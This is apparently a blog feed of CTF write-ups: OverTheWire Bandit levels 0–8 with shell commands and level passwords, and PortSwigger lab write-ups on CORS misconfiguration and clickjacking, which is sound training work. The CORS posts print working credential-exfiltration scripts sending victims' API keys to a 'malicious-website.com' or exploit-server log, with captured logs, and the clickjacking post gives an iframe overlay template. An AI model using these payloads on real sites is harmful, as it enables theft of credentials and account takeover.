url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/8.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/8.png" alt="Bandit Level 7 → Level 8"/><p>Bandit level 8 is all about finding a specific word in a file and extracting its value. In this level, we are given a file called <code>data.txt</code> and are tasked with finding the value of a specific word.</p><h3 id="steps">Steps</h3><ol><li>Connect to the Bandit server using SSH with the following command:</li></ol><pre><code>ssh bandit7@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>Enter the password for Bandit level 8 when prompted: <code>z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S</code>.</li><li>We are given a file called <code>data.txt</code>. Use the <code>cat</code> command to view the contents of the file:</li></ol><pre><code>cat data.txt
</code></pre><ol><li>We are tasked with finding the value of the word "millionth" in the file. To accomplish this, we can use the <code>grep</code> command to search for the word, and then use the <code>awk</code> command to extract its value. The command to do this is as follows:</li></ol><pre><code>cat data.txt | grep millionth | awk -F " " '{print $2}'
</code></pre><ol><li>After running the command, the value of the word "millionth" will be displayed in the terminal.</li></ol><pre><code>TESKZC0XvTetK0S9xNwm25STk5iWrBvP
</code></pre><h3 id="conclusion">Conclusion</h3><p>In this level, we learned how to search for a specific word in a file using the <code>grep</code> command and how to extract its value using the <code>awk</code> command. With this knowledge, we were able to successfully complete the level and obtain the password for the next level.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 6 → Level 7]]></title><description><![CDATA[Bandit 7 is the eigth level of the OverTheWire Bandit wargame. In this level, we will learn how to search for files by owner and size.]]></description><link>https://artofcode.tech/bandit-level-6-level-7</link><guid isPermaLink="false">Ghost__Post__64c184f0933210001bab1af2</guid><category><![CDATA[bandit]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 26 Jul 2023 20:44:09 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/7.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/7.png" alt="Bandit Level 6 → Level 7"/><p>Bandit 7 is the eigth level of the OverTheWire Bandit wargame. In this level, we will learn how to search for files by owner and size.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit6@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password from the previous level: <code>P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU</code>.</li><li>Once you're logged in, run the following command to search for files that are 33 bytes in size and owned by user <code>bandit7</code> and group <code>bandit6</code>:</li></ol><pre><code>find / -size 33c -user bandit7 -group bandit6 2>/dev/null
</code></pre><ol><li>This will output the location of the file. Use the <code>cat</code> command to read the contents of the file:</li></ol><pre><code>cat /var/lib/dpkg/info/bandit7.password
</code></pre><ol><li>You should now see the password for the next level which is <code>z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S</code>.</li></ol><p>Congratulations! You have successfully completed Bandit 7 and obtained the password for the next level.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 5 → Level 6]]></title><description><![CDATA[Bandit 6 is the seventh level of the OverTheWire Bandit wargame, we are tasked with finding a file within a directory hierarchy and extracting a password from that file.]]></description><link>https://artofcode.tech/bandit-level-5-level-6</link><guid isPermaLink="false">Ghost__Post__64bebc28673b64001b21fc9d</guid><category><![CDATA[bandit]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Mon, 24 Jul 2023 18:01:50 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/6.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/6.png" alt="Bandit Level 5 → Level 6"/><p>Bandit 6 is the seventh level of the OverTheWire Bandit wargame, we are tasked with finding a file within a directory hierarchy and extracting a password from that file.</p><h3 id="steps">Steps</h3><p>Connect to the remote server using SSH by running the following command in your terminal:</p><pre><code>ssh bandit5@bandit.labs.overthewire.org -p 2220
</code></pre><p>You will be prompted to enter the password for Bandit level 6, which is <code>lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR</code>. Enter the password and hit enter.</p><p>Once you have successfully logged in, navigate to the <code>inhere</code> directory by running the following command:</p><pre><code>cd inhere/
</code></pre><p>This directory contains a number of subdirectories and files, and our task is to find the file containing the password.</p><p>To find the file, we can use the <code>find</code> command with a combination of flags to search for files that meet certain criteria. In this case, we want to find files that are not executable and have a size of exactly 1033 bytes. We can use the following command:</p><pre><code>find . -type f -not -executable -size 1033c
</code></pre><p>This will return a list of files that meet the criteria.</p><p>Next, we want to check the contents of each file in the list to see if it contains the password. We can use the <code>file</code> command to check if each file is an ASCII text file, and then use <code>cat</code> to print the contents of any file that matches the criteria. We can use the following command:</p><pre><code>find . -type f -not -executable -size 1033c | xargs file | grep "ASCII text" | awk -F: '{print $1}' | xargs cat
</code></pre><p>This will print the contents of any file that is an ASCII text file and has a size of 1033 bytes and is not executable.</p><p>The password is located in the file <code>/home/bandit6/inhere/maybehere07/.file2</code>. Use the following command to print the contents of the file:</p><pre><code>cat /home/bandit6/inhere/maybehere07/.file2
</code></pre><p>This will output the password, which is <code>P4L4vucdmLnm8I7Vl7jG1ApGSfjYKqJU</code>.</p><p>Congratulations! You have successfully completed Bandit level 6.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 4 → Level 5]]></title><description><![CDATA[Bandit5 is the sixth level of the OverTheWire Bandit wargame. In this level, we will learn how to use the "file" command to determine the file type of a file and how to read the contents of a specific file. By completing this level, we will gain access to the password for the next level.]]></description><link>https://artofcode.tech/bandit-level-4-level-5</link><guid isPermaLink="false">Ghost__Post__64bc9613e283b6001b8f9f4f</guid><category><![CDATA[writeups]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 23 Jul 2023 02:55:55 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/ffmimrr.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/ffmimrr.png" alt="Bandit Level 4 → Level 5"/><p>Bandit5 is the sixth level of the OverTheWire Bandit wargame. In this level, we will learn how to use the "file" command to determine the file type of a file and how to read the contents of a specific file. By completing this level, we will gain access to the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit4@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password from the previous level, "2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe", and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li><li>Enter the following command to view the file types of all files in the "inhere" directory:</li></ol><pre><code>file inhere/*
</code></pre><ol><li>The output will show that all files in the directory are “data” files, except for one file which is a ASCII text file, this human-readable file should contain the password for the next level.</li><li>Enter the following command to read the contents of the file with the name "-file07" in the "inhere" directory:</li></ol><pre><code>cat inhere/-file07
</code></pre><ol><li>The output should show the password for the next level: lrIWWI6bB37kxfiCQZqUdOIYfr6eEeqR.</li></ol><p>Congratulations! You have successfully completed Bandit5 and gained access to the password for the next level.</p><h3 id="conclusion">Conclusion</h3><p>In this level, we learned how to use the "file" command to determine the file type of a file and how to read the contents of a specific file. These are important skills to have when working with files in Linux command line, and mastering them will be useful for solving future levels in the OverTheWire Bandit wargame.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 3 → Level 4]]></title><description><![CDATA[Bandit4 is the fifth level of the OverTheWire Bandit wargame. In this level, we will learn how to search for files that start with a dot and how to read the contents of a hidden file. By completing this level, we will gain access to the password for the next level.]]></description><link>https://artofcode.tech/bandit-level-3-level-4</link><guid isPermaLink="false">Ghost__Post__64b4afd6a9647b001bc517c7</guid><category><![CDATA[writeups]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Mon, 17 Jul 2023 03:09:24 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/ivrigr.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/ivrigr.png" alt="Bandit Level 3 → Level 4"/><p>Bandit4 is the fifth level of the OverTheWire Bandit wargame. In this level, we will learn how to search for files that start with a dot and how to read the contents of a hidden file. By completing this level, we will gain access to the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit3@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password from the previous level, "aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG", and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li><li>Enter the following command to search for files that start with a dot in the "inhere" directory:</li></ol><pre><code>find /home/bandit3/inhere/ -name ".*"
</code></pre><ol><li>The output should show a file path that ends with ".hidden". In this case, the path is /home/bandit3/inhere/.hidden.</li><li>Enter the following command to read the contents of the hidden file:</li></ol><pre><code>cat /home/bandit3/inhere/.hidden
</code></pre><ol><li>The output should show the password for the next level: 2EW7BBsr6aMMoJ2HjW067dm8EgX26xNe.</li></ol><p>Congratulations! You have successfully completed Bandit4 and gained access to the password for the next level.</p><h3 id="conclusion">Conclusion</h3><p>In this level, we learned how to search for files that start with a dot and how to read the contents of a hidden file. These are important skills to have when working with files in Linux command line, and mastering them will be useful for solving future levels in the OverTheWire Bandit wargame.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 2 → Level 3]]></title><description><![CDATA[Bandit3 is the fourth level of the OverTheWire Bandit wargame. In this level, we will learn how to handle filenames with spaces in them and how to read the contents of a file with a space in its name. By completing this level, we will gain access to the password for the next level.]]></description><link>https://artofcode.tech/bandit-level-2-level-3</link><guid isPermaLink="false">Ghost__Post__64adf45f347349001b0cb90b</guid><category><![CDATA[writeups]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 12 Jul 2023 00:34:52 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/oefiejgri.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/oefiejgri.png" alt="Bandit Level 2 → Level 3"/><p>Bandit3 is the fourth level of the OverTheWire Bandit wargame. In this level, we will learn how to handle filenames with spaces in them and how to read the contents of a file with a space in its name. By completing this level, we will gain access to the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit2@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password from the previous level, "rRGizSaX8Mk1RTb1CNQoXTcYZWU6lgzi", and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li><li>Enter the following command to search for files with spaces in their name:</li></ol><pre><code>find /home -name "spaces in this filename" 2>/dev/null
</code></pre><ol><li>The output should show the path to the file with spaces in its name. In this case, the path is /home/bandit2/spaces in this filename.</li><li>Enter the following command to read the contents of the file:</li></ol><pre><code>cat "/home/bandit2/spaces in this filename"
</code></pre><ol><li>The output should show the password for the next level: aBZ0W5EmUfAf7kHTQeOwd8bauFJ2lAiG.</li></ol><p>Congratulations! You have successfully completed Bandit3 and gained access to the password for the next level.</p><h3 id="conclusion">Conclusion</h3><p>In this level, we learned how to handle filenames with spaces in them and how to read the contents of a file with a space in its name. These are important skills to have when working with files in Linux command line, and mastering them will be useful for solving future levels in the OverTheWire Bandit wargame.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 1 → Level 2]]></title><description><![CDATA[Bandit2 is the third level of the OverTheWire Bandit wargame. In this level, we will learn how to handle special characters in filenames and how to read the contents of a file that has a hyphen in its name. By completing this level, we will gain access to the password for the next level.]]></description><link>https://artofcode.tech/bandit-level-1-level-2</link><guid isPermaLink="false">Ghost__Post__64a2e85aa1e563001b3c70a5</guid><category><![CDATA[writeups]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Mon, 03 Jul 2023 15:30:41 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/new.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/new.png" alt="Bandit Level 1 → Level 2"/><p>Bandit2 is the third level of the OverTheWire Bandit wargame. In this level, we will learn how to handle special characters in filenames and how to read the contents of a file that has a hyphen in its name. By completing this level, we will gain access to the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit1@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password from the previous level, "NH2SXQwcBdpmTEzi3bvBHMM9H66vVXjL", and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li><li>Enter the following command to search for files with a hyphen in their name:</li></ol><pre><code>find /home -name "-" 2>/dev/null
</code></pre><ol><li>The output should show the path to the file with a hyphen in its name. In this case, the path is /home/bandit1/-.</li><li>Enter the following command to read the contents of the file:</li></ol><pre><code>cat /home/bandit1/-
</code></pre><ol><li>The output should show the password for the next level: rRGizSaX8Mk1RTb1CNQoXTcYZWU6lgzi.</li></ol><p>Congratulations! You have successfully completed Bandit2 and gained access to the password for the next level.</p><h3 id="conclusion">Conclusion</h3><p>In this level, we learned how to handle special characters in filenames and how to read the contents of a file that has a hyphen in its name. These are important skills to have when working with files in Linux command line, and mastering them will be useful for solving future levels in the OverTheWire Bandit wargame.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 0 → Level 1]]></title><description><![CDATA[Bandit Level 0 → Level 1 is the second level of the OverTheWire Bandit wargame. In this level, we will learn how to use the "find" command to search for files and how to use the "cat" command to read the contents of a file.]]></description><link>https://artofcode.tech/bandit-level-0-level-1</link><guid isPermaLink="false">Ghost__Post__64873fd60fe140001b3e7682</guid><category><![CDATA[writeups]]></category><category><![CDATA[bandit]]></category><category><![CDATA[ctf]]></category><category><![CDATA[overthewire]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Mon, 12 Jun 2023 15:58:30 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/efiefie.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/efiefie.png" alt="Bandit Level 0 → Level 1"/><p>Bandit Level 0 → Level 1 is the second level of the OverTheWire Bandit wargame. In this level, we will learn how to use the "find" command to search for files and how to use the "cat" command to read the contents of a file. By completing this level, we will gain access to the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit0@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password from the previous level, "bandit0", and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li><li>Enter the following command to search for the file "readme" in the /home directory:</li></ol><pre><code>find /home -name readme 2>/dev/null
</code></pre><ol><li>The output should show the path to the "readme" file. In this case, the path is /home/bandit0/readme.</li><li>Enter the following command to read the contents of the "readme" file:</li></ol><pre><code>cat /home/bandit0/readme
</code></pre><ol><li>The output should show the password for the next level: NH2SXQwcBdpmTEzi3bvBHMM9H66vVXjL.</li></ol><p>Congratulations! You have successfully completed Bandit1 and gained access to the password for the next level.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 0]]></title><description><![CDATA[
Bandit0 is the first level of the OverTheWire Bandit wargame. In this level, we will learn how to use SSH to connect to the remote server and gain access to the password for the next level.]]></description><link>https://artofcode.com/bandit-0</link><guid isPermaLink="false">Ghost__Post__646c0987474c3b001baef98b</guid><category><![CDATA[writeups]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><category><![CDATA[ctf]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Tue, 23 May 2023 00:41:17 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/x.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/x.png" alt="Bandit Level 0"/><p>Bandit0 is the first level of the OverTheWire Bandit wargame. In this level, we will learn how to use SSH to connect to the remote server and gain access to the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit0@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter "bandit0" and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li></ol><p>Congratulations! You have successfully connected to Bandit0 using SSH and gained access to the next level.</p>]]></content:encoded></item><item><title><![CDATA[Portswigger’s lab write up: CORS vulnerability with trusted null origin]]></title><description><![CDATA[In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the “null” origin to obtain a user’s private credentials.]]></description><link>https:artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin</link><guid isPermaLink="false">Ghost__Post__63c87c3e44c9c3001d95fea2</guid><category><![CDATA[portswigger]]></category><category><![CDATA[writeups]]></category><category><![CDATA[cors]]></category><category><![CDATA[web]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 18 Jan 2023 23:13:40 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/qwerty.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/qwerty.png" alt="Portswigger’s lab write up: CORS vulnerability with trusted null origin"/><p>In this apprentice-level lab, we will exploit a website with a CORS vulnerability that trusts the “null” origin to obtain a user’s private credentials.</p><hr><p>Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to <code>/accountDetails</code> that fetches the user’s API key:</p><pre><code>HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
</code></pre><p>We can see that the <code>Access-Control-Allow-Credentials: true</code> is present, let’s try to duplicate this request and change the Origin header to something like <code>Origin: <https://example.com</code>> and see if this value is reflected, the resulting response will be something like this:</p><pre><code>HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
</code></pre><p>The Origin set in the request headers is not present in the <code>Access-Control-Allow-Origin</code> response headers, this could mean that the server does not have CORS vulnerabilities, let’s try setting the <code>Origin</code> header to <code>null</code> :</p><pre><code>HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
</code></pre><p>The <code>null</code> Origin set in the request headers is present in the <code>Access-Control-Allow-Origin</code> response headers, this confirms us that this request has a CORS vulnerability via <code>null</code> origin, let’s use the reading material’s sandboxed iframe template to craft our exploit so that the request is sent with the <code>Origin</code> header set to <code>null</code>:</p><pre><code>
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<https://vulnerable-website.com/sensitive-victim-data>',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
</code></pre><p>We have to modify out exploit to include the vulnerable website’s <code>/accountDetails</code> endpoint and our exploit server <code>/log</code> endpoint, the final exploit will look like this:</p><pre><code><iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','${LAB_URL}/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='{$EXPLOIT_SERVER_URL}/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
</code></pre><p>After sending this exploit to our victim we can read their credentials in our exploit server logs:</p><pre><code>10.0.4.136 2023-01-18 23:07:09 +0000 "GET //log?key=%7B%0A%20%20%22username%22%3A%20%22administrator%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22Cy5kzHkRRPli91YtqkDD7D5dOR3Nz7UH%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%22EPRXweYrVmKehWugd71p4CrWwJvBn4YS%22%0A%20%20%5D%0A%7D HTTP/1.1" 404 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.74 Safari/537.36"
</code></pre><p>Medium: <a href="https://medium.com/@artofcode_/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin-a451104dde0f">https://medium.com/@artofcode_/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin-a451104dde0f</a><br>Dev.to: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin-4g9c">https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-trusted-null-origin-4g9c</a><br>Github: <a href="https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin">https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-trusted-null-origin</a></br></br></p></hr>]]></content:encoded></item><item><title><![CDATA[Portswigger’s lab write up: CORS vulnerability with basic origin reflection]]></title><description><![CDATA[In this apprentice-level lab, we will exploit a website with a basic CORS vulnerability to obtain a user’s private credentials.]]></description><link>https://artofcode.tech/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection</link><guid isPermaLink="false">Ghost__Post__6390073bbd5569001dc8e533</guid><category><![CDATA[writeups]]></category><category><![CDATA[portswigger]]></category><category><![CDATA[web]]></category><category><![CDATA[cors]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 07 Dec 2022 03:28:13 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/cors.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/cors.png" alt="Portswigger’s lab write up: CORS vulnerability with basic origin reflection"/><p>In this apprentice-level lab, we will exploit a website with a basic CORS vulnerability to obtain a user’s private credentials.</p><hr><p>Upon logging in with the given credentials, we visit the account details page and check the response headers of the request to <code>/accountDetails</code> that fetches the user’s API key:</p><pre><code>HTTP/1.1 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
</code></pre><p>We can see that the <code>Access-Control-Allow-Credentials: true</code> is present, let’s try to duplicate this request and change the Origin header to something like <code>Origin: https://example.com</code> and see if this value is reflected, the resulting response will be something like this:</p><pre><code>HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://example.com
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "JQ7ufLKKzNoI4ahWKAKWBG5eP64wgwJW",
"sessions": [
"cdmflpOO6psYIp3novWUytbSDM9i68X1"
]
}
</code></pre><p>The Origin set in the request headers is present in the <code>Access-Control-Allow-Origin</code> response headers, this confirms us that this request has a CORS vulnerability, let’s use the reading material’s template to craft our exploit:</p><pre><code>var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://vulnerable-website.com/sensitive-victim-data',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='//malicious-website.com/log?key='+encodeURIComponent(this.responseText);
};
</code></pre><p>We have to modify out exploit to include the vulnerable website’s <code>/accountDetails</code> endpoint and our exploit server <code>/log</code> endpoint, after including the code in a <code><script></code> tag the final exploit will look like this:</p><pre><code><script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','${LAB_URL}/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='{$EXPLOIT_SERVER_URL}/log?key='+encodeURIComponent(this.responseText);
};
</script>
</code></pre><p>After sending this exploit to our victim we can read their credentials in our exploit server logs:</p><pre><code>181.63.62.250 2022-12-07 03:10:36 +0000 "GET /log?key=%7B%0A%20%20%22username%22%3A%20%22wiener%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22OiwIQ3xcR32ilUvyyai9tSWuUnzjfrzp%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%228QJ2k8dqE1vVtNcHmZixScfFPDENAzvo%22%2C%0A%20%20%20%20%22JNIc4VJZlskPdwjcf2C0fAREYXnaNATt%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
</code></pre><p>Medium: <a href="https://medium.com/@artofcode_/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection-db30604c8ff6">https://medium.com/@artofcode_/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection-db30604c8ff6</a><br>Dev.to: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection-2359">https://dev.to/christianpaez/portswiggers-lab-write-up-cors-vulnerability-with-basic-origin-reflection-2359</a><br>Github: <a href="https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-basic-origin-reflection" rel="noopener ugc nofollow">https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/cors/cors-vulnerability-with-basic-origin-reflection</a></br></br></p></hr>]]></content:encoded></item><item><title><![CDATA[Portswigger’s lab write up: Clickjacking with a frame buster script]]></title><description><![CDATA[In this apprentice level lab, we will exploit the change email flow from a website vulnerable to clickjacking via URL parameters, even though there is a frame buster script enabled.]]></description><link>https://artofcode.tech/portswiggers-lab-write-up-clickjacking-with-a-frame-buster-script</link><guid isPermaLink="false">Ghost__Post__6378491fc9852e001de8eade</guid><category><![CDATA[writeups]]></category><category><![CDATA[portswigger]]></category><category><![CDATA[web]]></category><category><![CDATA[clickjacking]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 19 Nov 2022 03:15:40 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/fram.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/fram.png" alt="Portswigger’s lab write up: Clickjacking with a frame buster script"/><p>In this apprentice level lab, we will exploit the change email flow from a website vulnerable to clickjacking via URL parameters, even though there is a frame buster script enabled.</p><hr><p>Upon logging in with the given credentials, we notice that after going to the account page, all that is needed to change a user’s email is click on the <code>Update Email</code> button and that the email can be prefilled via URL parameters. Let’s use the writing material’s clickjacking template to craft our exploit:</p><pre><code class="language-jsx"><head>
<style>
iframe {
position:relative;
width:700px;
height:600px;
opacity:0.1;
z-index:2;
}
div {
position:absolute;
z-index:1;
top: 100px;
}
</style>
</head>
<body>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
</iframe>
</body>
